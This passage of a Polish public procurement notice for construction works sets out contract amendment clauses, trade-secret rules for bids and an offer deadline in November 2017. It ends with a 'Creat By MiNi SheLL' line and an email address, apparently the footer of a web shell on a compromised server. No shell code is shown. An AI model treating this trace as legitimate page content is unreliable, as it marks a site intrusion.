wyczerpujące uzasadnienie faktyczne i prawneoraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie umowy. b) w przypadku zmianywysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10października 2002 r. o minimalnym wynagrodzeniu za pracę kwota wynagrodzenia Wykonawcy ulegniezmianie o wartość wzrostu całkowitego kosztu Wykonawcy, wynikającego ze zwiększenia wynagrodzeńosób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego minimalnegowynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostuminimalnego wynagrodzenia; c) w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lububezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotnekwota wynagrodzenia Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy,jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniudotychczasowej kwoty netto wynagrodzenia bezpośrednio wykonujących zamówienie na rzeczZamawiającego. d) Zmiana wynagrodzenia Wykonawcy, o której mowa w ust. 3 pkt 7) następować będziena wniosek Wykonawcy. Do wniosku o zmianę wynagrodzenia w przypadkach, o których mowa w ust. 3pkt 7 lit. a)-c) Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające zasadność złożeniatakiego wniosku wraz z wykazaniem ponad wszelką wątpliwość, że zaistniała zmiana ma bezpośredniwpływ na koszty wykonywania zamówienia oraz określeniem stopnia w jakim wpłynie ona na wysokośćwynagrodzenia wraz z dokładnym wyliczeniem kwoty wynagrodzenia Wykonawcy po zmianie umowy.e) Wykonawca wystąpi z wnioskiem o zmianę kwoty wynagrodzenia z co najmniej 30 dniowymwyprzedzeniem wobec wnioskowanej daty obowiązywania nowego wynagrodzenia. Wniosek powinienzawierać wyczerpujące uzasadnienie faktyczne i prawne. f) Zmiana wynagrodzenia wykonawcy możemieć miejsce wyłącznie wtedy, gdy zmiany, o których mowa w ust.3 pkt 7) będą mieć wpływ na kosztwykonania zamówienia przez wykonawcę. g) Zamawiający po zaakceptowaniu wniosku o którym mowaw ust.3 pkt 7) niniejszego paragrafu, wyznaczy datę podpisania aneksu h) Zmiana umowy skutkujezmianą wynagrodzenia jedynie w zakresie płatności realizowanych po dacie zawarcia aneksu do umowy8) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływna realizację przedmiotu umowy, 9) poprawy parametrów technicznych, jakości, sprawności, wydajnościlub innych parametrów charakterystycznych dla danego elementu robót budowlanych, dostaw, 10) zmianyproducenta urządzeń lub wyposażenia, w przypadku, gdy zmiana producenta urządzeń i wyposażeniabędzie korzystna dla Zamawiającego oraz spowoduje poprawę parametrów technicznych, jakości,sprawności, wydajności lub innych parametrów charakterystycznych dla danego urządzenia lubwyposażenia, 11) wycofania z produkcji określonego rodzaju przedmiotu zamówienia, niedostępności narynku Materiałów lub urządzeń wskazanych w Dokumentacji projektowej lub STWiORB, spowodowanazaprzestaniem produkcji lub wycofaniem z rynku tych Materiałów lub urządzeń, 12) wyniknięciarozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w innysposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celujednoznacznej interpretacji jej zapisów przez Strony. 13) zmiany osób odpowiedzialnych za nadzór nadrealizacją przedmiotu Umowy. Zmiana którejkolwiek z osób w trakcie realizacji przedmiotu niniejszejUmowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przezZamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycjii wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe odkwalifikacji i doświadczenia osób wymaganego postanowieniami Specyfikacji Istotnych WarunkówZamówienia. Przerwa w wykonywaniu Umowy wynikająca z braku personelu Wykonawcy będzietraktowana jako przyczyna zależna od Wykonawcy i nie może stanowić podstawy do przedłużeniaTerminu wykonania robót 14) wystąpienia oczywistych omyłek pisarskich i rachunkowych w treściumowy. 15) Wystąpienia konieczności zmian osób Wykonawcy w przypadku, gdy Zamawiający uzna,że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmianytych osób na inne spełniające na dzień składania ofert warunki określone w SIWZ w terminie niedłuższym niż 14 dni od daty złożenia wniosku przez zamawiającego. 16) Wykonawca musi przedłożyćZamawiającemu propozycję zmiany, o której mowa w pkt.15 nie później niż 7 dni przed planowanymskierowaniem do kierowania budową/robotami którejkolwiek osoby. Jakakolwiek przerwa w realizacjiprzedmiotu umowy wynikająca z braku kierownictwa budowy/robót będzie traktowana jako przerwawynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany Terminuzakończenia robót. 17) Zaakceptowana przez Zamawiającego zmiana którejkolwiek z osób, o którychmowa w pkt.15) winna być dokona wpisem do Dziennika budowy. 18) Ograniczenie zakresu robótwynikające z wprowadzenia zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego wDokumentacji projektowej, które wynikły w trakcie realizacji robót i były konieczne w celu prawidłowejrealizacji przedmiotu zamówienia tym samym zmniejszenia wynagrodzenia, o którym mowa w §9 ust. 1niniejszej umowy. 19) Z zastrzeżeniem przypadku, w którym Zamawiający nałożył obowiązek osobistegowykonania przez Wykonawcę kluczowych części zamówienia na roboty budowlane w SIWZ,Wykonawca może: a) powierzyć realizację części zamówienia Podwykonawcom, mimo nie wskazania wofercie takiej części do powierzenia podwykonawcom; b) wskazać inny zakres Podwykonawstwa, niżprzedstawiony w Ofercie; c) zrezygnować z Podwykonawstwa, d) wskazać innych Podwykonawców niżprzedstawieni w Ofercie 20) Zmiany podwykonawcy lub rezygnacji z podwykonawcy podmiotu, naktórego zasoby Wykonawca powoływał się, na zasadach określonych w art.22a ust.1 , w celu wykazaniaspełniania warunków udziału w postępowaniu, wówczas Wykonawca zobowiązany jest wykazaćZamawiającemu, że proponowanych inny Podwykonawca lub wykonawca samodzielnie spełnia je wstopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakciepostępowania o udzielenie zamówienia, który będzie podmiotem udostępniającym zasoby niezbędnedo realizacji zamówienia. W takim przypadku wykonawca jest zobowiązany zaproponować innegopodwykonawcę spełniającego warunki określone przez zamawiającego w specyfikacji wrazz załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych §VI i VII specyfikacjiistotnych warunków zamówienia 21) W przypadkach określonych w art. 144 ust 1 pkt 3) - 6) ustawy Pzp4. W przedstawionych w ust. 2 pkt.1) -18) przypadkach wystąpienia opóźnień, strony ustalą noweTerminy, z tym, że maksymalny okres przesunięcia Terminu zakończenia realizacji przedmiotu Umowyrówny będzie okresowi przerwy lub przestoju. Przesunięcie terminu będzie musiało być szczegółowouzasadnione przez Wykonawcę i zaakceptowane przez Zamawiającego, z wyjątkiem zaistnieniaokoliczności, o których mowa w ust. 2 pkt.1). 5. Jeżeli z jakiejkolwiek przyczyny, która nie uprawniaWykonawcy do przedłużenia terminu wykonania robót lub ich części, tempo robót wedługZamawiającego nie pozwoli na terminowe ich zakończenie, Zamawiający może polecić Wykonawcypodjęcie działań dla przyspieszenia tempa robót. Wszystkie koszty związane z podjętymi działaniamiobciążają Wykonawcę. 6. Zamawiający ma możliwość przedłużenia Terminu realizacji niniejszej umowyz przyczyn nieleżących po stronie Wykonawcy. 7. Zamawiający jest uprawniony do żądania zmianysposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy w związku ze zmianamizawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmianami wytycznychdotyczących realizacji projektu. 8. Jeżeli Wykonawca uważa się za uprawnionego do przedłużeniaTerminu zakończenia robót na podstawie ust.2, zmiany Umowy w zakresie Materiałów, parametrówtechnicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotuUmowy na podstawie ust.3 i §15 Umowy lub zmiany Umowy na innej podstawie wskazanej w niniejszejUmowie, zobowiązany jest do przekazania Inspektorowi Nadzoru Inwestorskiego wniosku dotyczącegozmiany Umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiejzmiany. 9. Wniosek, o którym mowa w ust.8 powinien zostać przekazany niezwłocznie, jednakże niepóźniej niż w terminie 20 dni roboczych od dnia, w którym Wykonawca dowiedział się, lub powiniendowiedzieć się o danym zdarzeniu lub okolicznościach. 10. Wykonawca zobowiązany jest dodostarczenia wraz z wnioskiem, o którym mowa w ust.8, wszelkich innych dokumentów wymaganychUmową i informacji uzasadniających żądanie zmiany Umowy, stosowanie do zdarzenia lub okolicznościstanowiących podstawę żądania zmiany. 11. Wykonawca zobowiązany jest do bieżącej dokumentacjikoniecznej dla uzasadnienia żądania zmiany i przechowywania jej na Terenie budowy lub w innymmiejscu wskazanym przez Inspektora Nadzoru Inwestorskiego lub Zamawiającego. 12. Po otrzymaniuwniosku, o którym mowa w ust. 8, Inspektor Nadzoru Inwestorskiego jest uprawniony, bez dokonywaniaoceny jego zasadności, do kontroli dokumentacji, o której mowa w ust.11. i wydania Wykonawcypolecenia prowadzenia dalszej dokumentacji bieżącej uzasadniającej żądanie zmiany. 13. Wykonawca jestzobowiązany do okazania do wglądu Inspektorowi Nadzoru Inwestorskiego dokumentacji, o której mowaw ust.11 i przedłożenia na żądanie Inspektora Nadzoru Inwestorskiego jej kopii. 14. W terminie 5 dniroboczych od dnia otrzymania wniosku, o którym mowa w ust. 8 wraz z informacjami uzasadniającymiżądanie zmiany Umowy, Inspektor Nadzoru Inwestorskiego zobowiązany jest do pisemnegoustosunkowania się do zgłoszonego żądania zmiany Umowy, i przekazania go Zamawiającemu wraz zuzasadnieniem, zarówno w przypadku odmowy, jak i akceptacji żądania zmiany. 15. W terminie 5 dniroboczych od dnia otrzymania żądania zmiany, zaopiniowanego przez Inspektora NadzoruInwestorskiego, Zamawiający powiadomi Wykonawcę o akceptacji żądania zmiany Umowy i terminiepodpisania aneksu do Umowy lub odpowiednio o braku akceptacji zmiany. 16. Nie stanowią zmianyumowy w rozumieniu art. 144 ust. 1 Pzp następujące zmiany: 1) danych związanych z obsługąadministracyjno-organizacyjną Umowy, w szczególności zmiana numeru rachunku bankowego, 2) danychteleadresowych, 3) danych rejestrowych, 4) będące następstwem sukcesji uniwersalnej po jednej ze stronUmowy,</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania">Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów ozwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofert,zastrzegł, że nie mogą one być udostępniane oraz wykazał, że stanowią tajemnicę przedsiębiorstwa. Wprzypadku, gdy informacje zawarte w ofercie stanowią tajemnicę przedsiębiorstwa w rozumieniuprzepisów ustawy o zwalczaniu nieuczciwej konkurencji, co do których Wykonawca zastrzega, że niemogą być udostępniane innym uczestnikom postępowania, muszą być oznaczone klauzulą ,,NIEUDOSTĘPNIAĆ. INFORMACJE STANOWIĄ TAJEMNICĘ PRZEDSIĘBIORSTWA WROZUMIENIU ART. 11 ust. 4 USTAWY O ZWALCZANIU NIEUCZCIWEJ KONKURENCJI" idołączone do oferty. Zaleca się, aby były trwale, oddzielenie spięte. Zgodnie z wyżej cytowanymprzepisem przez tajemnicę przedsiębiorstwa rozumie się nieujawnione do wiadomości publicznejinformacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne informacje posiadającewartość gospodarczą, co do których przedsiębiorca podjął działania w celu zachowania ich poufności.Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy Pzp. Zamawiającyinformuje, że w przypadku kiedy wykonawca otrzyma od niego wezwanie w trybie art. 90 ustawy PZP, azłożone przez niego wyjaśnienia i/lub dowody stanowić będą tajemnicę przedsiębiorstwa w rozumieniuustawy o zwalczaniu nieuczciwej konkurencji Wykonawcy będzie przysługiwało prawo zastrzeżenia ichjako tajemnica przedsiębiorstwa. Przedmiotowe zastrzeżenie zamawiający uzna za skuteczne wyłącznie wsytuacji kiedy Wykonawca oprócz samego zastrzeżenia, jednocześnie wykaże, iż dane informacjestanowią tajemnicę przedsiębiorstwa, w szczególności warunku o których mowa w ust.11. Wykonawcamusi wykazać, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa, w szczególnościokreślając, w jaki sposób zostały spełnione przesłanki, o których mowa w art. 11 pkt 4 ustawy z 16kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, zgodnie z którym tajemnicę przedsiębiorstwastanowi określona informacja, jeżeli spełnia łącznie 3 warunki: 1) ma charakter techniczny,technologiczny, organizacyjny przedsiębiorstwa lub jest to inna informacja mająca wartość gospodarczą,2) nie została ujawniona do wiadomości publicznej, 3) podjęto w stosunku do niej niezbędne działania wcelu zachowania poufności. W sytuacji, gdy wykonawca zastrzeże w ofercie informacje, które niestanowią tajemnicy przedsiębiorstwa lub są jawne na podstawie przepisów ustawy Prawo zamówieńpublicznych lub odrębnych przepisów, informacje te będą podlegały udostępnieniu na zasadach takichsamych jak pozostałe, niezastrzeżone dokumenty. Środki służące ochronie informacji o charakterzepoufnym</span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-11-07</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com